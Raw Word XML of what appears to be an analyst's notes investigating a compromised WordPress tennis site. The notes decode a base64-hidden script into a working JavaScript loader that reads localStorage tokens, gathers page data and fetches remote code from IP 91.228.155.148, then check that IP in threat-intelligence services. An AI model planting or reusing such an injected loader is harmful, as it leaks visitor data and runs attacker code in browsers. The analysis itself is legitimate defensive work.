    </w:p>
    <w:p w14:paraId="2CBBFDD7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$(".infinite-content").infinitescroll("retrieve");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4305EC7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return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554E208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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314369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$(window).load(function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0245BB3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if ($(".mvp-nav-links a").length) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482B2E0D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$(".mvp-inf-more-but").css("display", "inline-block");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B928E1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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0062631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    $(".mvp-inf-more-but").css("display", "none");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597F8B6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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D13841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    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BEA1B9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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4F015C" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DF4076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05CBEFE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/script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBE43D5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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3D2BF4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'http://todosobretenis.com/wp-content/themes/zox-news/js/scripts.js?ver=4.9.18' &gt; &lt; /script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECC06EF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3432C9C1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'http://todosobretenis.com/wp-content/themes/zox-news/js/retina.js?ver=4.9.18' &gt; &lt; /script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B72BD2B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCFDC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'http://todosobretenis.com/wp-content/themes/zox-news/js/jquery.infinitescroll.min.js?ver=4.9.18' &gt; &lt; /script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103BEE93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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663C2D0E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'http://todosobretenis.com/wp-includes/js/comment-reply.min.js?ver=4.9.18' &gt; &lt; /script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D996002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type = 'text/javascript'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7004F21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src = 'http://todosobretenis.com/wp-includes/js/wp-embed.min.js?ver=4.9.18' &gt; &lt; /script&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C8FDA8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/body&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B7D5A6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/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BFCF3" w14:textId="77777777" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2973C03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&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A27BFC" w14:textId="77777777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script data - ad - client = "ca-pub-9874625214760801"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8686B5" w14:textId="6C7B699B" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE2D6D">
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                        async src = "https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js" &gt; &lt; /script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A529BDF" w14:textId="6E328310" w:rsidR="00940393" w:rsidRPr="00BE2D6D" w:rsidRDefault="00940393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22DB00D7" w14:textId="46C966D8" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t>------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762AEEF6" w14:textId="681E409C" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="6BA19A94" w14:textId="31B40DE9" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="63867E15" w14:textId="1B0CAD81" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t>Once section need to be looked at closer……..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5068F651" w14:textId="65BE7410" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="56778691" w14:textId="20DEDFFE" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t>At the top of the script… and it is base64 encoded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C99C15" w14:textId="58759118" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="314C19CA" w14:textId="4F862C94" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t xml:space="preserve">    script src = "data:text/javascript;</w:t>
      </w:r>
      <w:r w:rsidRPr="00940393">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00940393">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="00940393">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:t>" &gt; &lt; /script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E9D70B" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="42C8EE5C" w14:textId="316D10A5" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="40245FE2" w14:textId="44B351E1" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t>------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FC0A98" w14:textId="2E590EEA" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="299DE93F" w14:textId="6A5063B3" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t>Decode the contents of the script that is highlighted in green.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2105852A" w14:textId="6BD26B9B" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="027700DD" w14:textId="064CA453" w:rsidR="00940393" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00940393" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.base64decode.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76AB763B" w14:textId="4548B288" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="7E8264C3" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393"/>
    <w:p w14:paraId="6B608ADE" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    (function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BC5491" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    var name = '_Y4VcGx3QpWzpwjCQ';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61052A7F" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    if (!window._Y4VcGx3QpWzpwjCQ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3C32AA" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        window._Y4VcGx3QpWzpwjCQ = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06706626" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">            unique: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210B70BC" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">            ttl: 86400,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF0A739" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">            R_PATH: 'http://91.228.155.148/vgQC69',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014C2820" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">            P_PATH: 'http://91.228.155.148/e13e940/postback',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AC151C" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B2C9F0" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F9B74E" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    const _hNg5CVFp8SBmhjHv = localStorage.getItem('config');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FA113E" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    if (typeof _hNg5CVFp8SBmhjHv !== 'undefined' &amp;&amp; _hNg5CVFp8SBmhjHv !== null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34742C33" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        var _mxJgmgKwf3MbJkJ7 = JSON.parse(_hNg5CVFp8SBmhjHv);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D06E9A" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        var _1q11XhshfyvXz28Z = Math.round(+new Date()/1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422FEE20" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        if (_mxJgmgKwf3MbJkJ7.created_at + window._Y4VcGx3QpWzpwjCQ.ttl &lt; _1q11XhshfyvXz28Z) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF15D8" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">            localStorage.removeItem('subId');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A85DF99" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">            localStorage.removeItem('token');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDFF281" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">            localStorage.removeItem('config');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36673DDE" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BD42FE" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BFDFD7" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    var _ZYL3QWwwTc9pDK92 = localStorage.getItem('subId');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFB2595" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    var _9cFCQZPCMzsgqDr6 = localStorage.getItem('token');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DD7CE0" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    var _nk2z3h1dnRS49Ywp = '?return=js.client';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0C7C9C" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        _nk2z3h1dnRS49Ywp += '&amp;' + decodeURIComponent(window.location.search.replace('?', ''));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46154157" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        _nk2z3h1dnRS49Ywp += '&amp;se_referrer=' + encodeURIComponent(document.referrer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38788A30" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        _nk2z3h1dnRS49Ywp += '&amp;default_keyword=' + encodeURIComponent(document.title);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035A1647" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        _nk2z3h1dnRS49Ywp += '&amp;landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3215562B" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        _nk2z3h1dnRS49Ywp += '&amp;name=' + encodeURIComponent(name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7797882F" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        _nk2z3h1dnRS49Ywp += '&amp;host=' + encodeURIComponent(window._Y4VcGx3QpWzpwjCQ.R_PATH);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5067BE" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    if (typeof _ZYL3QWwwTc9pDK92 !== 'undefined' &amp;&amp; _ZYL3QWwwTc9pDK92 &amp;&amp; window._Y4VcGx3QpWzpwjCQ.unique) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A89075" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        _nk2z3h1dnRS49Ywp += '&amp;sub_id=' + encodeURIComponent(_ZYL3QWwwTc9pDK92);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBAA754" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B21EA7" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    if (typeof _9cFCQZPCMzsgqDr6 !== 'undefined' &amp;&amp; _9cFCQZPCMzsgqDr6 &amp;&amp; window._Y4VcGx3QpWzpwjCQ.unique) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764EBE09" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        _nk2z3h1dnRS49Ywp += '&amp;token=' + encodeURIComponent(_9cFCQZPCMzsgqDr6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DD6983" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A25A55F" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    var a = document.createElement('script');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71462518" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        a.type = 'application/javascript';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0A0607" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">        a.src = window._Y4VcGx3QpWzpwjCQ.R_PATH + _nk2z3h1dnRS49Ywp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A95FB35" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    var s = document.getElementsByTagName('script')[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D2F0BB" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    s.parentNode.insertBefore(a, s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0569EC8F" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    })();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F5F5F5" w14:textId="4B17CAD8" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">    ---------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C620B1" w14:textId="6ACD8D32" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="6AAE9C77" w14:textId="3D35A688" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t>We see a time to live for one day (86400 seconds) and the path of the script that is really being called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4DC0FA" w14:textId="17F11FCC" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="5A0DF47A" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t>ttl: 86400,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6468DFDC" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            R_PATH: 'http://91.228.155.148/vgQC69',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2660D836" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393" w:rsidP="00940393">
      <w:r>
        <w:t xml:space="preserve">            P_PATH: 'http://91.228.155.148/e13e940/postback',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185D9AF2" w14:textId="77777777" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="16C66CEF" w14:textId="554DC7A4" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="23F0CEF9" w14:textId="55659BF5" w:rsidR="00940393" w:rsidRDefault="00940393">
      <w:r>
        <w:t>--------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64614D9F" w14:textId="03EBC660" w:rsidR="00940393" w:rsidRDefault="00940393"/>
    <w:p w14:paraId="0725FCC9" w14:textId="082BD575" w:rsidR="00940393" w:rsidRDefault="00AF0E66">
      <w:r>
        <w:t>Now examine the ip 91.228.155[.]148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66837DCA" w14:textId="1A82ABC0" w:rsidR="00940393" w:rsidRDefault="003F0BF7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23E0923C" wp14:editId="716D2A60">
            <wp:extent cx="5943600" cy="2657475"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="9525"/>
            <wp:docPr id="7" name="Picture 7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ical user interface, application, Teams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74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039621" w14:textId="7EA33E5C" w:rsidR="003F0BF7" w:rsidRDefault="003F0BF7"/>
    <w:p w14:paraId="579C4F79" w14:textId="63905B3A" w:rsidR="003F0BF7" w:rsidRDefault="003F0BF7">
      <w:r>
        <w:t>IP is suspicious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA2968C" w14:textId="424A74EE" w:rsidR="003F0BF7" w:rsidRDefault="003F0BF7"/>
    <w:p w14:paraId="533C978D" w14:textId="77777777" w:rsidR="003F0BF7" w:rsidRDefault="003F0BF7" w:rsidP="003F0BF7">
      <w:r>
        <w:t>-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D74ADB2" w14:textId="78D43499" w:rsidR="003F0BF7" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="003F0BF7" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://community.riskiq.com/search/91.228.155.148/hostpairs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1673F129" w14:textId="7FF2CCE9" w:rsidR="003F0BF7" w:rsidRDefault="003F0BF7"/>
    <w:p w14:paraId="20AC0640" w14:textId="50CEE6C2" w:rsidR="003F0BF7" w:rsidRDefault="000D4640">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C776DF4" wp14:editId="7D0034F7">
            <wp:extent cx="5943600" cy="3074670"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="11430"/>
            <wp:docPr id="8" name="Picture 8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Table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46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57C2BB" w14:textId="3BD66995" w:rsidR="003F0BF7" w:rsidRDefault="003F0BF7"/>
    <w:p w14:paraId="2B9D5751" w14:textId="4E2B7E44" w:rsidR="003F0BF7" w:rsidRDefault="003F0BF7"/>
    <w:p w14:paraId="7597C740" w14:textId="219B2D82" w:rsidR="003F0BF7" w:rsidRDefault="000D4640">
      <w:r>
        <w:t>Host pairs shows a connection to domains using a script the IP address 91.228.155[.]148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23979EB8" w14:textId="77777777" w:rsidR="003F0BF7" w:rsidRDefault="003F0BF7"/>
    <w:p w14:paraId="4CEE5275" w14:textId="1964713A" w:rsidR="003F0BF7" w:rsidRDefault="000D4640">
      <w:r>
        <w:t>---------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445123D4" w14:textId="77D84FC8" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="4079AEB5" w14:textId="073ADEE8" w:rsidR="000D4640" w:rsidRDefault="000D4640">
      <w:r>
        <w:t>Looking at the IP in urlscan.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788630A3" w14:textId="4F04CC8F" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="062860CC" w14:textId="1F26F80F" w:rsidR="000D4640" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="000D4640" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://urlscan.io/result/90c5c13e-40ce-4700-ae98-259418dda903/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="075A3AC2" w14:textId="3507212E" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="6D90B15B" w14:textId="69E11E18" w:rsidR="000D4640" w:rsidRDefault="000D4640">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D3037BE" wp14:editId="7D720EFD">
            <wp:extent cx="5943600" cy="3022600"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="12700"/>
            <wp:docPr id="9" name="Picture 9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text, application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4C75C7" w14:textId="2CB23E5B" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="4D0EE2E7" w14:textId="54CC82D4" w:rsidR="000D4640" w:rsidRDefault="000D4640">
      <w:r>
        <w:t>No useful information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C3E811" w14:textId="2AAAA0FB" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="6EEE77A0" w14:textId="662664B1" w:rsidR="000D4640" w:rsidRDefault="000D4640">
      <w:r>
        <w:t>---------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E33E78" w14:textId="69F1D1E2" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="7D0DC767" w14:textId="14A7C7BC" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="03A640F5" w14:textId="2435D5CB" w:rsidR="000D4640" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId23" w:anchor="91.228.155.148" w:history="1">
        <w:r w:rsidR="000D4640" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://urlscan.io/search/#91.228.155.148</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="546C529D" w14:textId="40578684" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="78D05183" w14:textId="059F7A82" w:rsidR="000D4640" w:rsidRDefault="000D4640">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A8BA4E1" wp14:editId="2F1856E7">
            <wp:extent cx="5943600" cy="2684145"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="8255"/>
            <wp:docPr id="10" name="Picture 10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41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2B9010" w14:textId="55F30409" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="66EEB33F" w14:textId="4667DDA7" w:rsidR="000D4640" w:rsidRDefault="000D4640">
      <w:r>
        <w:t>Several domains in the past have been connect to this domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AF1BCC" w14:textId="6DCA2990" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="7FA96BF3" w14:textId="0F8D355C" w:rsidR="000D4640" w:rsidRDefault="00067395">
      <w:hyperlink r:id="rId25" w:anchor="transactions" w:history="1">
        <w:r w:rsidR="000D4640" w:rsidRPr="007018B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://urlscan.io/result/ba54e49a-1a3b-4b3d-872a-c07d72f68ab6/#transactions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E7CD4D2" w14:textId="3744C983" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="64F37E2E" w14:textId="480F8B87" w:rsidR="000D4640" w:rsidRDefault="000D4640">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5029358A" wp14:editId="215B5448">
            <wp:extent cx="5943600" cy="1898650"/>
            <wp:effectExtent l="12700" t="12700" r="12700" b="19050"/>
            <wp:docPr id="11" name="Picture 11" descr="Tex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Text&#10;&#10;Description automatically generated with low confidence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8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68A32C" w14:textId="35A0977B" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="6CE02625" w14:textId="77777777" w:rsidR="000D4640" w:rsidRDefault="000D4640"/>
    <w:p w14:paraId="38A6EEE1" w14:textId="59F831BB" w:rsidR="000D4640" w:rsidRDefault="000D4640">
      <w:r>
        <w:t>---------</w:t>
      </w:r>
    </w:p>
